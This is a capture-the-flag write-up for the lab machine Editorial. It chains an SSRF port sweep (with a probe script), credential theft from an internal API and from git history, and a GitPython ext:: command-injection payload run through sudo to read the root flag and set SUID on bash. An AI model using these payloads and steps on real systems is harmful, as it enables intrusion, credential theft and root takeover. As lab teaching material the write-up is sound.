This writeup covers Editorial, an easy-level Capture The Flag (CTF) machine that is well suited to beginners. The chain is short and illustrates four common weaknesses: an SSRF in the cover-upload form exposes an internal API, a message leaked by that API gives SSH access, credentials left in git history give a second user, and a GitPython vulnerability gives root.

Add Hosts#

Edit the /etc/hosts file and add the following entries:

10.10.11.20 editorial.htb

Script to add hosts automatically#

ip="10.10.11.20"
domain="editorial.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV editorial.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 21:06 CEST
Nmap scan report for tiempoarriba.htb (10.10.11.20)
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSRF via the Cover Upload Form#

The form at http://editorial.htb/upload accepts a cover either as a file upload or as a URL (the bookurl field). The server fetches bookurl itself and shows the result as the preview image, so the field is a server-side request forgery (SSRF) primitive. Intercept the form submission to /upload-cover with Burp Suite and send it to Repeater.

Finding Port 5000#

Point bookurl at the loopback interface, http://127.0.0.1:PORT/, and iterate PORT with Intruder or a script. For a closed port the server returns its default preview; for a port with a listener it saves the fetched response body under /static/uploads/ and returns that new path, so an open port stands out by response length and content. Port 5000 is the one that answers. Downloading that "preview" file gives you the internal service's raw response.

Here is the base request to replay, varying the port in the bookurl value:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------345673946433514815222539054036
Content-Length: 365
Origin: http://editorial.htb
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://editorial.htb/upload
Priority: u=0

-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/
-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

-----------------------------345673946433514815222539054036--
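The port sweep described above, as an added example that is not code from the original writeup. It rebuilds the captured multipart request, probes every loopback port through the bookurl field and flags ports whose response differs from the majority answer. The target base URL, the boundary string and the placeholder path used by the offline stand-in are assumptions; swap fake_target for post_upload_cover to run it against the box.

```python
"""Sweep loopback ports on the target through the bookurl SSRF in /upload-cover.

Added example for this writeup, not code from the original page. It assumes the
behaviour described above: a closed port makes the server answer with its
default preview path, while a listening port makes it save the fetched body
under /static/uploads/ and return that new path. TARGET, the boundary string
and the placeholder path used by the offline stand-in are assumptions.
"""
from collections import Counter
from typing import Callable, Dict, Iterable
import urllib.request
import uuid

TARGET = "http://editorial.htb"       # assumed base URL of the target
BOUNDARY = "----editorialSsrfProbe"   # arbitrary multipart boundary


def build_upload_cover_body(bookurl: str) -> bytes:
    """Build the multipart/form-data body the /upload-cover form submits,
    mirroring the captured request: a bookurl field plus an empty bookfile."""
    body = (
        f"--{BOUNDARY}\r\n"
        'Content-Disposition: form-data; name="bookurl"\r\n\r\n'
        f"{bookurl}\r\n"
        f"--{BOUNDARY}\r\n"
        'Content-Disposition: form-data; name="bookfile"; filename=""\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        "\r\n"
        f"--{BOUNDARY}--\r\n"
    )
    return body.encode()


def post_upload_cover(bookurl: str) -> str:
    """Live sender: POST the form to TARGET and return the response body."""
    req = urllib.request.Request(
        f"{TARGET}/upload-cover",
        data=build_upload_cover_body(bookurl),
        headers={"Content-Type": f"multipart/form-data; boundary={BOUNDARY}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def sweep_ports(send: Callable[[str], str], ports: Iterable[int],
                host: str = "127.0.0.1") -> Dict[int, str]:
    """Probe http://host:port/ for every port and return {port: response}
    for the ports whose response differs from the majority answer. The most
    common body is taken as the closed-port baseline, so no port has to be
    assumed closed in advance."""
    responses = {port: send(f"http://{host}:{port}/").strip() for port in ports}
    baseline, _ = Counter(responses.values()).most_common(1)[0]
    return {port: body for port, body in responses.items() if body != baseline}


# Offline stand-in for the target (constructed; mimics the behaviour above).
PLACEHOLDER = "/static/images/default_cover.jpeg"   # assumed default preview


def fake_target(bookurl: str) -> str:
    port = int(bookurl.rsplit(":", 1)[1].rstrip("/"))
    if port == 5000:   # the only internal listener on this box
        return f"static/uploads/{uuid.uuid5(uuid.NAMESPACE_URL, bookurl)}"
    return PLACEHOLDER


if __name__ == "__main__":
    # Swap fake_target for post_upload_cover to run this against the box.
    for port, path in sweep_ports(fake_target, range(1, 65536)).items():
        print(f"port {port} answered; fetch http://editorial.htb/{path}")
```

Taking the majority response as the baseline rather than a fixed "known closed" port keeps the sweep correct even if the first probed port happens to be open; the cost is one extra pass over the responses, which is negligible next to the HTTP round trips.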

Fetch and Inspect Files#

Once a probe reaches the internal service, the response to the POST /upload-cover request contains the path of the saved file under /static/uploads/. Fetch it, pretty-print it (the internal API answers in JSON) and remove the local copy; enter only the file name, the part after /static/uploads/:

printf 'Endpoint --> '
read -r endpoint
wget -q "http://editorial.htb/static/uploads/$endpoint"
jq . "$endpoint"
rm -f "$endpoint"

The root of the internal API lists further endpoints, which are worth querying the same way.

Exploit Another Endpoint#

Repeat the request with bookurl set to http://127.0.0.1:5000/api/latest/metadata/messages/authors and fetch the saved file the same way. This message contains credentials.

SSH Access#

With the credentials taken from that message, SSH in as dev and read the user flag:

ssh dev@editorial.htb
cat user.txt

Git Inspection#

The dev user's home contains an apps directory that is a git repository. Credentials that were later removed from the code survive in the history, so inspect the commit diffs rather than the working tree; there is no need to reset the branch (git reset --hard rewrites the checkout and gains nothing here):

cd apps
git log --oneline --all   # list all commits
git log --all -p          # show every commit's diff

Extract Credentials#

To pull the credential lines out of the commit diffs automatically, keep the diff sign so you can see which commit added (+) and which removed (-) each value (note that filtering the output with awk 'NR==1' would keep only the first match and drop the password line):

git log --all -p | grep -E "^[-+].*(Username|Password):"
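The grep above finds the lines; the following added example (not from the writeup) parses the `git log --all -p` output itself and attributes every matching line to the commit and author that added or removed it, which tells you which commit to read in full. The sample log is constructed for the offline demo: its hashes, e-mail address and passwords are made up.

```python
"""Attribute credentials found in `git log --all -p` output to their commit.

Added example, not code from the writeup. scan_git_log walks the patch
output, remembers the current commit header, and reports every added (+) or
removed (-) diff line that looks like a credential. SAMPLE_LOG is a
constructed log for the offline demo; its hashes, address and secrets are
invented.
"""
from __future__ import annotations

import re
import subprocess
from dataclasses import dataclass

# Keys worth flagging in a diff line; extend for the code base at hand.
SECRET_RE = re.compile(
    r"(Username|Password|passwd|token|api[_-]?key)\s*[:=]\s*(\S+)", re.I
)


@dataclass
class Finding:
    commit: str
    author: str
    change: str   # "+" added by this commit, "-" removed by it
    key: str
    value: str


def scan_git_log(log_text: str) -> list[Finding]:
    """Parse `git log -p` text and return the credential-looking diff lines."""
    findings: list[Finding] = []
    commit = author = "?"
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("Author:"):
            author = line[len("Author:"):].strip()
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            m = SECRET_RE.search(line[1:])
            if m:
                findings.append(Finding(commit, author, line[0], m.group(1), m.group(2)))
    return findings


def scan_repo(path: str) -> list[Finding]:
    """Run git on a real checkout (not used by the offline demo)."""
    out = subprocess.run(["git", "-C", path, "log", "--all", "-p"],
                         capture_output=True, text=True, check=True).stdout
    return scan_git_log(out)


# Constructed sample: one commit that swapped prod credentials for dev ones.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.htb>
Date:   Mon Jan 1 00:00:00 2024 +0000

    change(api): downgrade prod to dev

diff --git a/app_api/app.py b/app_api/app.py
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -1,4 +1,4 @@
-* Username: prod
-* Password: s3cret-pr0d
+* Username: dev
+* Password: s3cret-dev
commit 2222222222222222222222222222222222222222
Author: dev <dev@example.htb>
Date:   Sun Dec 31 00:00:00 2023 +0000

    initial commit

diff --git a/README.md b/README.md
--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+Internal API docs
"""

if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_LOG):
        print(f"{f.commit[:8]} {f.change} {f.key}={f.value} ({f.author})")
```

Lines removed by a commit are the interesting ones here: a "-" Password line is a secret someone tried to retire, and it is still recoverable from the object store of every clone.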

Privilege Escalation#

Switch to the prod user with the recovered password and check what it may run with sudo:

su prod
sudo -l

You will find:

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

Exploiting GitPython CVE-2022-24439#

clone_prod_change.py hands its first argument to GitPython as a URL to clone. GitPython versions affected by CVE-2022-24439 (fixed in 3.1.30) do not reject git's ext:: transport, which runs the named command, and because sudo runs the script as root that command runs as root. Inside an ext:: URL an unescaped space separates arguments and "% " (percent followed by a space) is an escaped space inside an argument, which is why the payload is written with % signs. Read the root flag by redirecting it to a file:

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
cat /tmp/root

The clone itself fails, since sh does not speak the git protocol, but the command has already run by then.

Getting an actual root shell#

The same primitive can set the SUID bit on /bin/bash; the -p flag tells bash to keep the effective UID instead of dropping it:

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% 4755% /bin/bash'
/bin/bash -p